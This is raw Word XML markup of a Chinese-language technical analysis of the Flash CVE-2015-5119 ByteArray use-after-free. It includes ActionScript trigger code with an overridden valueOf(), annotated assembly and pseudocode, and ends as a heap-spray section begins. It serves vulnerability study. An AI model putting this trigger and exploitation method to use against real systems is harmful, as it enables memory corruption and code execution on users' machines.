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20" w:rsidRDefault="008D6870" w:rsidP="00570A00">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D6870">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2015-5119漏洞利用分析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E4BDA" w:rsidP="0075202C">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4BDA">
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>flashplayer1</w:t>
            </w:r>
            <w:r w:rsidR="00BF0721">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4BDA">
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>_0r0_</w:t>
            </w:r>
            <w:r w:rsidR="00252317">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>182</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4BDA">
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>_win_debug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2E5B58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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漏洞成因</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C388B" w:rsidRPr="00B824C2" w:rsidRDefault="001F7BC0" w:rsidP="00B824C2">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B824C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2015</w:t>
      </w:r>
      <w:r w:rsidR="00793067" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>年7月，Hacking</w:t>
      </w:r>
      <w:r w:rsidR="00793067" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00793067" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Team被黑，</w:t>
      </w:r>
      <w:r w:rsidR="001A1231" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多达400G</w:t>
      </w:r>
      <w:r w:rsidR="00793067" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidR="002B7149">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r w:rsidR="002B7149" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>泄露</w:t>
      </w:r>
      <w:r w:rsidR="00793067" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，其中就包括flash</w:t>
      </w:r>
      <w:r w:rsidR="00793067" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00793067" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0day</w:t>
      </w:r>
      <w:r w:rsidR="00793067" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00793067" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CVE-2015-5119的</w:t>
      </w:r>
      <w:r w:rsidR="00466C7F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞利用程序</w:t>
      </w:r>
      <w:r w:rsidR="00CA6F90">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00793067" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其漏洞利用手法精妙，</w:t>
      </w:r>
      <w:r w:rsidR="00316431">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>包括</w:t>
      </w:r>
      <w:r w:rsidR="00114BB5" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>微量的heap</w:t>
      </w:r>
      <w:r w:rsidR="00114BB5" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00114BB5" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>spray、精准的定位、</w:t>
      </w:r>
      <w:r w:rsidR="00822B87">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>无ROP</w:t>
      </w:r>
      <w:r w:rsidR="00822B87">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00114BB5" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bypass</w:t>
      </w:r>
      <w:r w:rsidR="00114BB5" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> DEP CFG</w:t>
      </w:r>
      <w:r w:rsidR="00114BB5" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidR="00E71D6E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00114BB5" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>均值得学习</w:t>
      </w:r>
      <w:r w:rsidR="00793067" w:rsidRPr="00B824C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB378D" w:rsidRDefault="00AB378D" w:rsidP="00632A05">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB378D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-2015-5119是一个存在于AS3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ByteArray类的UAF漏洞</w:t>
      </w:r>
      <w:r w:rsidR="006C54A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00386C95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>首先创建一个ByteArray对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B44C0" w:rsidRPr="009F6571" w:rsidRDefault="000B44C0" w:rsidP="000B44C0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B44C0">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1DB4">
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F6571">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>var ba:ByteArray = new ByteArray();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B44C0" w:rsidRPr="009F6571" w:rsidRDefault="000B44C0" w:rsidP="000B44C0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ba.length = 8;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593E5B" w:rsidRPr="009F6571" w:rsidRDefault="000B44C0" w:rsidP="000B44C0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ba[1] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2130E" w:rsidRDefault="000B44C0" w:rsidP="003D19BA">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidR="00B12798">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>访问ba</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的元素</w:t>
      </w:r>
      <w:r w:rsidR="00F2130E" w:rsidRPr="00F2130E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00F2130E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也可以将</w:t>
      </w:r>
      <w:r w:rsidR="00F2130E" w:rsidRPr="00F2130E">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>numeric</w:t>
      </w:r>
      <w:r w:rsidR="00F2130E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> byte写入ba</w:t>
      </w:r>
      <w:r w:rsidR="00F2130E">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidR="00F2130E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，当然也可以将一个对象写入ByteArray，比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00767798" w:rsidRPr="009F6571" w:rsidRDefault="00767798" w:rsidP="00767798">
      <w:pPr>
        <w:ind w:firstLine="420"/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>var obj = new MyClass();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F0748B" w:rsidRPr="009F6571" w:rsidRDefault="00767798" w:rsidP="00154E02">
      <w:pPr>
        <w:ind w:left="420"/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>ba[0] = obj;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4F53" w:rsidRDefault="000C418A" w:rsidP="000C418A">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AS3会隐式调用</w:t>
      </w:r>
      <w:r w:rsidRPr="000C418A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyClass.valueOf()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法将</w:t>
      </w:r>
      <w:r w:rsidRPr="000C418A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyClass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象转换成</w:t>
      </w:r>
      <w:r w:rsidRPr="000C418A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>numeric</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值赋给ba[]</w:t>
      </w:r>
      <w:r w:rsidR="00436EF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="008400FC" w:rsidRPr="000C418A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyClass.valueOf()</w:t>
      </w:r>
      <w:r w:rsidR="008400FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以通过用户代码简单重定义：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003739ED" w:rsidRPr="009F6571" w:rsidRDefault="0059297F" w:rsidP="003739ED">
      <w:pPr>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003739ED" w:rsidRPr="009F6571">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>class MyClass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003739ED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{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003739ED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    prototype.valueOf = function()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003739ED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    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003739ED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        ba.length = 88; // reallocate ba[] storage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003739ED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        return 0;       // return byte for ba[offset]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003739ED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    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008400FC" w:rsidRPr="009F6571" w:rsidRDefault="003739ED" w:rsidP="003739ED">
      <w:pPr>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6571">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2130E" w:rsidRDefault="00B32C77" w:rsidP="008E76A0">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>现在来看下native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code中隐式调用</w:t>
      </w:r>
      <w:r w:rsidRPr="000C418A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>valueOf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>()是什么样的：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push esi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mov  eax, [esp+8]                // the offset value from "ba[offset] = obj"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push eax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add  ecx, 0x18                   // ecx = this = "ba" object pointer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call ByteArray.getStorage()      // gets ba[offset] storage pointer and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mov  esi, eax                    // saves it in esi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F616ED" w:rsidRPr="00F616ED" w:rsidRDefault="00F616ED" w:rsidP="00F616ED">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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mov  ecx, [esp+0xC]              // "obj" pointer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push ecx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call AvmCore.toInteger()         // call MyClass.valueOf()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add  esp,4</w:t>
      </w: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mov  [esi], al                   // writes returned byte into array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F616ED" w:rsidRPr="00F616ED" w:rsidRDefault="00F616ED" w:rsidP="00F616ED">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F616ED" w:rsidRPr="00F616ED" w:rsidRDefault="00F616ED" w:rsidP="00F616ED">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F616ED">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    pop  esi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B32C77" w:rsidRDefault="00F616ED" w:rsidP="00403F56">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F616ED">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ret  8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00403F56" w:rsidRDefault="00CC6D98" w:rsidP="00CC6D98">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以看到</w:t>
      </w:r>
      <w:r w:rsidR="00A60666">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidR="00A60666" w:rsidRPr="00F616ED">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>call ByteArray.getStorage()</w:t>
      </w:r>
      <w:r w:rsidR="00A60666">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取到</w:t>
      </w:r>
      <w:r w:rsidR="00A60666" w:rsidRPr="00F616ED">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ba[offset]</w:t>
      </w:r>
      <w:r w:rsidR="00A60666">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的指针赋给了局部变量esi，此后通过</w:t>
      </w:r>
      <w:r w:rsidR="00A60666" w:rsidRPr="00F616ED">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>call AvmCore.toInteger()</w:t>
      </w:r>
      <w:r w:rsidR="00A60666">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidR="00A60666" w:rsidRPr="000C418A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>valueOf</w:t>
      </w:r>
      <w:r w:rsidR="00A60666">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>()的返回值</w:t>
      </w:r>
      <w:r w:rsidR="007C1AB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>赋</w:t>
      </w:r>
      <w:r w:rsidR="00A60666">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>给esi指向的地址</w:t>
      </w:r>
      <w:r w:rsidR="00EB6432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC6D98" w:rsidRDefault="00CC6D98" w:rsidP="00CC6D98">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A78E3" w:rsidRDefault="00627606" w:rsidP="00BF1775">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>高级语言是这样的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00960568" w:rsidRPr="00960568" w:rsidRDefault="00960568" w:rsidP="00960568">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00960568">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    void ByteArray.setObjInternal(int offset, obj)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00960568" w:rsidRPr="00960568" w:rsidRDefault="00960568" w:rsidP="00960568">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00960568">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00960568" w:rsidRPr="00960568" w:rsidRDefault="00960568" w:rsidP="00960568">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00960568">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        byte* dest = this.getStorage(offset);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00960568" w:rsidRPr="00960568" w:rsidRDefault="00960568" w:rsidP="00960568">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00960568">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="00085B00" w:rsidRPr="00960568">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00960568">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dest = toInteger(obj);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00627606" w:rsidRDefault="00960568" w:rsidP="00960568">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00960568">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A78E3" w:rsidRDefault="00987529" w:rsidP="00B82F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F616ED">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ba[offset]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的指针保存在局部变量中，</w:t>
      </w:r>
      <w:r w:rsidR="00122C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AS3的</w:t>
      </w:r>
      <w:r w:rsidRPr="00987529">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r w:rsidR="00122C1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>被native</w:t>
      </w:r>
      <w:r w:rsidR="00122C1B">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00122C1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>code调用后会将返回值赋给局部变量。由于</w:t>
      </w:r>
      <w:r w:rsidR="00122C1B" w:rsidRPr="00987529">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r w:rsidR="00122C1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以在用户代码中重定义，如果通过</w:t>
      </w:r>
      <w:r w:rsidR="00122C1B" w:rsidRPr="00987529">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r w:rsidR="00B205EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidR="00122C1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ByteArray的长度，那么局部变量保存的指针指向的地址将被释放，该指针成为了一个悬挂指针，从而存在UAF的内存破坏漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357A8F" w:rsidRPr="00AB378D" w:rsidRDefault="00357A8F" w:rsidP="00D066C9">
      <w:pPr>
        <w:rPr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2E5B58"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815303" w:rsidRDefault="00C7395D" w:rsidP="00531A3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UAF漏洞利用的关键</w:t>
      </w:r>
      <w:r w:rsidR="00AA724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在于“占位”</w:t>
      </w:r>
      <w:r w:rsidR="00652793">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，形成悬挂指针后，需要申请与悬挂指针指向的已被释放的内存空间相同大小的内存</w:t>
      </w:r>
      <w:r w:rsidR="005C2FD0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidR="00652793">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“占位”，从而可以通过操作悬挂指针来破坏占位内存数据，最终达到利用效果。</w:t>
      </w:r>
      <w:r w:rsidR="00547429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>而占位的关键则在于Heap</w:t>
      </w:r>
      <w:r w:rsidR="00547429">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Spray</w:t>
      </w:r>
      <w:r w:rsidR="00547429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815303" w:rsidRPr="000B5B05" w:rsidRDefault="00620953" w:rsidP="00531A3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A18CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="001004CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="003A18CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> HeapSpray</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00462D6A" w:rsidRDefault="00286407" w:rsidP="00531A3A">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00000F6A">
        <w:rPr>
          <w:szCs w:val="21"/>
